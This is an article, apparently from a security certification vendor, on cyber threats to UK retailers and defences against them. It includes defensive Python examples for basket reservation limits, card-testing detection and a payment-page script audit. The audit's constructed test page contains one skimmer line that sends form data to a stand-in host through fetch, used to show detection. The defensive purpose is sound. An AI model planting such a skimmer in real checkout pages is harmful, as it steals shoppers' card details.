For UK retailers, cyber crime is a major and expensive problem. With shopping now firmly based online, businesses rely on everything from e-commerce websites to mobile apps to serve their customers. While these digital tools are essential, they also give criminals more opportunities to attack.
The financial damage is significant, costing the retail industry millions each year and putting customer data at constant risk. To protect their business and their customers, retailers must first understand the most common types of cyber attacks they are up against.
Retail Cyber Security Challenges
In 2025, cyber crime remained a significant threat to UK retailers. According to the Kantar cyber crime survey, 32% of retail and wholesale businesses experienced a breach or cyber attack in the past year. The British Retail Consortium has also reported that cyber attacks are one of the key concerns of retailers as retail crime spirals out of control. The organisation estimates the total cost of retail crime – including cyber – at £4.2 billion. Major incidents such as the 2025 attack on Marks & Spencer cost the business around £300 million.
AI is accelerating the problem: 91% of the security experts surveyed expect a rise in AI-driven threats over the next few years.
Retail's underlying vulnerability is its large attack surface, which keeps growing as e-commerce becomes the main sales channel. The business depends on a high volume of transactions and complex customer journeys that cannot be throttled or interrupted without damaging the business model. The digitisation of retail, the proliferation of mobile apps and the integration of third-party services (payment, analytics and marketing scripts) have made the sector especially attractive to attackers.
Ransomware gets a lot of attention, but e-commerce must also defend itself against retail-specific threats. These fall into two categories: routine threats that every retailer must counter daily, and less common but potentially more serious ones. They include:
Scalping bots
A diverse category of automated software that buys up items in short supply (graphics cards, concert tickets, limited-edition trainers) so they can be resold at inflated prices. Scalpers succeed because humans cannot compete with their speed and accuracy, leaving online retailers as unwitting middlemen for a resale market they have lost control of. In most cases they are not even illegal, despite the harm they do to consumers and to the retailer's brand; the UK has criminalised the use of bots to buy event tickets beyond a seller's limit, but that is the exception.
How could retailers protect themselves? This is not easy: anti-bot systems can detect and rate-limit automated traffic, but the bots adapt quickly, and AI-powered bots that mimic human browsing are increasingly common. Practical controls include per-account and per-payment-method purchase limits on scarce items, queue or raffle-based launches, and bot management at the network edge.
Social engineering and phishing
This attack targets people, not technology. Criminals use psychological manipulation to trick employees or customers into giving away sensitive information. Common retail examples include fake emails with malicious links (phishing), fraudulent phone calls to staff (vishing), or fake delivery texts to customers (smishing). These are all designed to steal credentials, money, or data.
How could retailers protect themselves? Regular staff training on how to spot these scams is the primary defence. It should be combined with technical controls such as email filtering, DMARC on the retailer's own domains so that customers can trust mail that claims to come from it, and multi-factor authentication (MFA), preferably phishing-resistant, so that stolen credentials alone are not enough to cause a breach.
Denial of inventory
Denial of inventory games e-commerce and online booking systems by placing goods in a checkout basket and holding them there, so that nobody else can buy them. By the time the goods are released back to sale, time has elapsed and genuine buyers have gone elsewhere. It is akin to a denial-of-service attack but harder to block, because it uses the normal sales process rather than malformed traffic.
How could retailers protect themselves? Denial of inventory bots imitate human mouse movements and keystrokes to evade anti-bot systems. Machine learning-based defences are now standard for spotting the subtler differences between human and automated interactions, but they are not foolproof. Simpler controls matter as well: short basket reservation timeouts, per-session and per-account caps on scarce items, and prompt release of unpaid holds back to stock.
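The reservation logic those simpler controls describe, as an added example written for this page (it is not code from the original article or from any retailer's platform). The hold duration, the per-session cap and the stock figures are assumed values chosen for illustration; a real system would keep stock and holds in a database rather than in memory. Expired holds are returned to stock before every operation, and topping up a hold does not extend its original expiry, so a bot cannot keep an item off sale by adding one unit at a time.

```python
"""Basket reservation with expiry and a per-session cap (denial-of-inventory control)."""

HOLD_SECONDS = 600           # assumed: an unpaid basket hold lasts 10 minutes
MAX_UNITS_PER_SESSION = 2    # assumed: cap per session on a scarce SKU


class Inventory:
    def __init__(self, stock):
        self.stock = dict(stock)   # sku -> units currently available for sale
        self.holds = {}            # (session, sku) -> (units held, expiry time)

    def _expire(self, now):
        """Return the units of every lapsed hold to stock."""
        for key, (units, expires_at) in list(self.holds.items()):
            if expires_at <= now:
                self.stock[key[1]] += units
                del self.holds[key]

    def reserve(self, session, sku, units, now):
        """Hold `units` of `sku` for `session`; False if capped or out of stock."""
        self._expire(now)
        key = (session, sku)
        held, expires_at = self.holds.get(key, (0, now + HOLD_SECONDS))
        if units <= 0 or held + units > MAX_UNITS_PER_SESSION:
            return False
        if self.stock.get(sku, 0) < units:
            return False
        self.stock[sku] -= units
        # Top-ups keep the original expiry so the hold cannot be refreshed forever.
        self.holds[key] = (held + units, expires_at)
        return True

    def confirm(self, session, sku):
        """Payment completed: the hold becomes a sale. Returns units sold."""
        units, _ = self.holds.pop((session, sku), (0, 0))
        return units

    def available(self, sku, now):
        self._expire(now)
        return self.stock.get(sku, 0)


if __name__ == "__main__":
    inv = Inventory({"gpu": 5})            # constructed stock level
    print(inv.reserve("bot-a", "gpu", 2, now=0))     # True
    print(inv.reserve("bot-a", "gpu", 1, now=1))     # False: per-session cap
    print(inv.available("gpu", now=700))             # 5: the hold has lapsed
```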
Fake merchandise and websites
Fake products are the problem retailers suspect they might have but often cannot see, because lost sales remain hidden. The issue predates e-commerce, but online shopping has made it much worse. Once, selling fakes at any scale required a shop; now anyone can clone a legitimate website. The Intellectual Property Office's (IPO) Trading Standards survey highlights ongoing enforcement actions and warnings about fake goods sold online.
How could retailers protect themselves? By detecting fake online channels with digital risk protection (DRP) services that monitor newly registered look-alike domains, marketplaces and social media channels for illicit activity, backed by a takedown process and brand registration with the major marketplaces.
Carding attacks
Also known as card testing: criminals obtain stolen card data and validate it by attempting small purchases, often under £2 or a zero-value authorisation. Cards that succeed are then used for higher-value purchases, on the same site or elsewhere. Retailers bear the chargebacks, a gateway fee for every failed attempt and the cost of any goods shipped, all of which hurt profits.
How could retailers protect themselves? With a mixture of velocity checks (many attempts from one IP address, device or session across many different cards), machine learning, IP reputation analysis, and browser validation (checking whether the client behaves like a normal browser rather than a script), plus step-up challenges once a session looks suspicious and alerting on a sudden spike in declines.
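The velocity check above, run over checkout log lines, as an added example written for this page (not code from the original article or from any payment provider). The log format, the IP addresses, the card tokens and the thresholds are constructed for illustration; production logs would carry a tokenised card reference, never the PAN. The detector flags an IP that makes many low-value attempts across many distinct cards with a high decline rate inside a short window, and then reports which approved cards went on to a higher-value "cash-out" purchase in the same window.

```python
"""Card-testing (carding) detector over constructed checkout log lines."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: timestamp, client IP, card token, amount (GBP), gateway result.
LOG = """\
2025-03-01T10:00:01 203.0.113.7 424242-0001 1.00 DECLINED
2025-03-01T10:00:03 203.0.113.7 424242-0002 1.00 DECLINED
2025-03-01T10:00:05 203.0.113.7 424242-0003 1.00 APPROVED
2025-03-01T10:00:06 203.0.113.7 424242-0004 1.00 DECLINED
2025-03-01T10:00:09 203.0.113.7 424242-0005 1.00 DECLINED
2025-03-01T10:00:40 203.0.113.7 424242-0003 249.99 APPROVED
2025-03-01T10:05:00 198.51.100.4 555555-9911 34.50 APPROVED
2025-03-01T10:06:10 198.51.100.4 555555-9911 12.00 APPROVED
"""

WINDOW = timedelta(minutes=5)   # assumed detection window
LOW_VALUE = 2.00                # assumed: probes at or below this amount count as tests
MIN_ATTEMPTS = 5                # assumed thresholds for a finding
MIN_DISTINCT_CARDS = 3
MIN_DECLINE_RATIO = 0.5


def parse(log):
    """Parse log lines into (timestamp, ip, card, amount, result) tuples."""
    rows = []
    for line in log.splitlines():
        ts, ip, card, amount, result = line.split()
        rows.append((datetime.fromisoformat(ts), ip, card, float(amount), result))
    return rows


def detect_carding(rows):
    """Return {ip: details} for every IP whose traffic matches the card-testing pattern."""
    by_ip = defaultdict(list)
    for row in rows:
        by_ip[row[1]].append(row)
    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        for t0, _, _, _, _ in events:
            window = [e for e in events if t0 <= e[0] < t0 + WINDOW]
            probes = [e for e in window if e[3] <= LOW_VALUE]
            if len(probes) < MIN_ATTEMPTS:
                continue
            cards = {e[2] for e in probes}
            if len(cards) < MIN_DISTINCT_CARDS:
                continue
            declines = sum(1 for e in probes if e[4] == "DECLINED")
            if declines / len(probes) < MIN_DECLINE_RATIO:
                continue
            # Cards that passed the test and were then used for a real purchase.
            approved = {e[2] for e in probes if e[4] == "APPROVED"}
            cashout = [e for e in window if e[3] > LOW_VALUE and e[2] in approved]
            findings[ip] = {
                "probes": len(probes),
                "distinct_cards": len(cards),
                "decline_ratio": round(declines / len(probes), 2),
                "cashout_cards": sorted({e[2] for e in cashout}),
            }
            break   # one finding per IP is enough to raise an alert
    return findings


if __name__ == "__main__":
    for ip, detail in detect_carding(parse(LOG)).items():
        print(ip, detail)
```

On the constructed log, 203.0.113.7 is reported with five £1 probes across five cards, an 80% decline rate and card 424242-0003 used for the £249.99 cash-out; the two ordinary purchases from 198.51.100.4 are not flagged. In practice the same logic should also be keyed by device fingerprint and session, since carders rotate IP addresses.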
Account takeover (ATO) fraud
ATO fraud is a type of e-commerce attack in which criminals gain access to legitimate accounts, most often by credential stuffing: replaying username and password pairs leaked in other breaches against the retailer's login page. This leads to a range of frauds, including buying goods, redeeming loyalty points, stealing stored card details, and identity fraud, or a combination of these. Another incarnation is the creation of fake accounts, which are used to launder stolen funds into gift cards, post fake reviews, or carry out denial of inventory fraud.
How could retailers protect themselves? ATO attacks are hard to detect without risking false positives or deterring customers with friction such as CAPTCHAs. As with denial of inventory, the answer is more layers of behavioural analysis to spot abnormal login and account-creation patterns, alongside MFA, checking new passwords against known-breached lists, rate-limiting logins per IP address and per account, and notifying customers of new-device logins and of changes to their email or delivery address.
Web skimming attacks
Perhaps the most feared of all, skimming attacks compromise a retailer's checkout by injecting malicious JavaScript that copies card details as the customer types them, either into the retailer's own code or into a third-party script the page loads. While the Magecart groups first gained notoriety in 2018 with attacks on Ticketmaster and British Airways, these attacks have evolved and continue to affect retailers today.
Recent Magecart-style campaigns have used sophisticated techniques to target major brands' UK online stores, Casio among them, making this a persistent and growing risk for the retail sector.
How could retailers protect themselves? Code injection can be made harder, and detected when it happens, with a Content Security Policy (CSP) that restricts where scripts may load from and where the page may send data, Subresource Integrity (SRI) hashes on third-party scripts, an inventory of every script on payment pages with change detection, and regular audits of e-commerce code and JavaScript. PCI DSS v4.0 requirements 6.4.3 and 11.6.1 now require exactly that script inventory and tamper detection on payment pages.
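A minimal payment-page script audit of the kind those requirements call for, as an added example written for this page (not code from the original article, from Casio, or from any PCI tooling). The retailer domain, the analytics domain, the checkout script body and the page HTML are all constructed for illustration. The baseline records the SRI hash of every script the checkout is allowed to load; the audit then parses a served copy of the page and reports any inline script, any script from a source not in the baseline, and any baseline script whose integrity attribute no longer matches.

```python
"""Payment-page script inventory check (web skimming / Magecart control)."""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value (sha384-...) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


# Constructed baseline: the only script the checkout page is allowed to load,
# recorded with its SRI hash at deployment time.
CHECKOUT_SRC = "https://static.example-shop.co.uk/checkout.js"   # assumed domain
CHECKOUT_JS = b"document.getElementById('pay').addEventListener('click', submitCard);"
BASELINE = {CHECKOUT_SRC: sri_hash(CHECKOUT_JS)}


class ScriptCollector(HTMLParser):
    """Collect every <script> on a page with its src, integrity and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_page(html: str, baseline=BASELINE):
    """Return a list of (finding, detail) for scripts that deviate from the baseline."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"] is None:
            findings.append(("inline-script", s["body"].strip()))
        elif s["src"] not in baseline:
            findings.append(("unknown-src", s["src"]))
        elif s["integrity"] != baseline[s["src"]]:
            findings.append(("integrity-mismatch", s["src"]))
    return findings


# Constructed page: the approved script, an injected loader from an unknown
# domain, and an inline skimmer that posts the form contents elsewhere.
PAGE = f"""<html><body>
<script src="{CHECKOUT_SRC}" integrity="{BASELINE[CHECKOUT_SRC]}"></script>
<script src="https://cdn.example-analytics.net/tag.js"></script>
<script>fetch('https://collect.example.net/?d=' + btoa(document.forms[0].innerText))</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_page(PAGE):
        print(*finding)
```

Run on a schedule against the live checkout (and from outside the corporate network, since skimmers often serve clean code to known scanner addresses), this catches both of the common injection routes: a new script tag added by a compromised platform, and a silently altered third-party script. A CSP `script-src` allow-list and `connect-src`/`form-action` restrictions should sit alongside it so that even an undetected skimmer has nowhere to send the data.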
Stronger Security Measures
Retailers can feel like sitting ducks, liable to be picked off even after investing in expensive security software. Yet in most types of e-commerce fraud the core of the problem is a lack of control over customer accounts and how they are secured. It follows that anything that improves the security of those accounts, such as multi-factor authentication (MFA) or biometric login, both now widely used, makes fraud harder.
Just as important is constant vigilance: assuming the system is under attack all the time rather than waiting for the worst to happen. Many retailers are also moving customers towards mobile apps, which are easier to control, and towards enhanced verification. The future of e-commerce will be based on identifying and authenticating the customer more systematically.
Whether you are seeking ISO 27001 certification or simply aiming to improve your information security, implementing an ISMS is a great way to help your retail business manage sensitive information.
Cyber Essentials certification can also help your organisation improve its cyber framework and deliver better security for customers.
Get started on your journey to certification – get a quote today or contact our team of experts to discuss your needs.
